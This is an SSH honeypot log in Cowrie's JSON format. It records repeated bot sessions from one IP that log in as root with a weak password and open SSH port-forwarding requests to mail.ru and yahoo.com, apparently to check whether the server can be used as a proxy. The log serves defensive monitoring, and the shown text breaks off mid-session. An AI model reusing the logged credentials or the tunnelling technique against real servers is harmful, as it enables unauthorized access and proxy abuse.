{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:19.604300Z","src_ip":"77.83.207.83","session":"051b405eac61"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:19.859368Z","src_ip":"77.83.207.83","session":"051b405eac61"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10976,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10976","sensor":"my-vps","timestamp":"2025-08-31T03:44:19.911435Z","session":"051b405eac61"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:19.962558Z","src_ip":"77.83.207.83","session":"051b405eac61"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":20247,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:20247","sensor":"my-vps","timestamp":"2025-08-31T03:44:20.105682Z","session":"051b405eac61"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:20.157203Z","src_ip":"77.83.207.83","session":"051b405eac61"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":21059,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:21059","sensor":"my-vps","timestamp":"2025-08-31T03:44:20.301580Z","session":"051b405eac61"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:20.353325Z","src_ip":"77.83.207.83","session":"051b405eac61"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:20.405126Z","src_ip":"77.83.207.83","session":"051b405eac61"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39478,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffcb7258d535","protocol":"ssh","message":"New connection: 77.83.207.83:39478 (1.2.3.4:22) [session: ffcb7258d535]","sensor":"my-vps","timestamp":"2025-08-31T03:44:20.454930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:20.455995Z","src_ip":"77.83.207.83","session":"ffcb7258d535"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:20.506541Z","src_ip":"77.83.207.83","session":"ffcb7258d535"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:20.758252Z","src_ip":"77.83.207.83","session":"ffcb7258d535"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32303,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:32303","sensor":"my-vps","timestamp":"2025-08-31T03:44:20.809371Z","session":"ffcb7258d535"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:20.860464Z","src_ip":"77.83.207.83","session":"ffcb7258d535"}
{"eventid":"cowrie.session.closed","duration":"20.0","message":"Connection lost after 20.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:20.900960Z","src_ip":"212.227.125.160","session":"284d438b8be9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":16469,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:16469","sensor":"my-vps","timestamp":"2025-08-31T03:44:21.004722Z","session":"ffcb7258d535"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:21.055053Z","src_ip":"77.83.207.83","session":"ffcb7258d535"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":4606,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:4606","sensor":"my-vps","timestamp":"2025-08-31T03:44:21.196607Z","session":"ffcb7258d535"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:21.246977Z","src_ip":"77.83.207.83","session":"ffcb7258d535"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:21.298035Z","src_ip":"77.83.207.83","session":"ffcb7258d535"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39560,"dst_ip":"1.2.3.4","dst_port":22,"session":"3248ab37d31f","protocol":"ssh","message":"New connection: 77.83.207.83:39560 (1.2.3.4:22) [session: 3248ab37d31f]","sensor":"my-vps","timestamp":"2025-08-31T03:44:21.346977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:21.357207Z","src_ip":"77.83.207.83","session":"3248ab37d31f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:21.397521Z","src_ip":"77.83.207.83","session":"3248ab37d31f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:21.647605Z","src_ip":"77.83.207.83","session":"3248ab37d31f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":30276,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:30276","sensor":"my-vps","timestamp":"2025-08-31T03:44:21.698897Z","session":"3248ab37d31f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:21.749262Z","src_ip":"77.83.207.83","session":"3248ab37d31f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":25932,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:25932","sensor":"my-vps","timestamp":"2025-08-31T03:44:21.892454Z","session":"3248ab37d31f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:21.942587Z","src_ip":"77.83.207.83","session":"3248ab37d31f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":30261,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:30261","sensor":"my-vps","timestamp":"2025-08-31T03:44:22.084727Z","session":"3248ab37d31f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:22.135044Z","src_ip":"77.83.207.83","session":"3248ab37d31f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:22.186627Z","src_ip":"77.83.207.83","session":"3248ab37d31f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39638,"dst_ip":"1.2.3.4","dst_port":22,"session":"504425fcbe2e","protocol":"ssh","message":"New connection: 77.83.207.83:39638 (1.2.3.4:22) [session: 504425fcbe2e]","sensor":"my-vps","timestamp":"2025-08-31T03:44:22.238550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:22.239305Z","src_ip":"77.83.207.83","session":"504425fcbe2e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:22.291652Z","src_ip":"77.83.207.83","session":"504425fcbe2e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:22.552982Z","src_ip":"77.83.207.83","session":"504425fcbe2e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":25993,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:25993","sensor":"my-vps","timestamp":"2025-08-31T03:44:22.607648Z","session":"504425fcbe2e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:22.660261Z","src_ip":"77.83.207.83","session":"504425fcbe2e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":17464,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:17464","sensor":"my-vps","timestamp":"2025-08-31T03:44:22.806927Z","session":"504425fcbe2e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:22.859417Z","src_ip":"77.83.207.83","session":"504425fcbe2e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":15202,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:15202","sensor":"my-vps","timestamp":"2025-08-31T03:44:23.006725Z","session":"504425fcbe2e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:23.059126Z","src_ip":"77.83.207.83","session":"504425fcbe2e"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:23.112594Z","src_ip":"77.83.207.83","session":"504425fcbe2e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":39752,"dst_ip":"1.2.3.4","dst_port":22,"session":"117085d6be9c","protocol":"ssh","message":"New connection: 77.83.207.83:39752 (1.2.3.4:22) [session: 117085d6be9c]","sensor":"my-vps","timestamp":"2025-08-31T03:44:23.162612Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:23.172831Z","src_ip":"77.83.207.83","session":"117085d6be9c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:23.214111Z","src_ip":"77.83.207.83","session":"117085d6be9c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:23.468914Z","src_ip":"77.83.207.83","session":"117085d6be9c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":29563,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:29563","sensor":"my-vps","timestamp":"2025-08-31T03:44:23.520883Z","session":"117085d6be9c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:23.571814Z","src_ip":"77.83.207.83","session":"117085d6be9c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":24978,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:24978","sensor":"my-vps","timestamp":"2025-08-31T03:44:23.717221Z","session":"117085d6be9c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:23.768076Z","src_ip":"77.83.207.83","session":"117085d6be9c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":5054,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:5054","sensor":"my-vps","timestamp":"2025-08-31T03:44:23.913340Z","session":"117085d6be9c"}
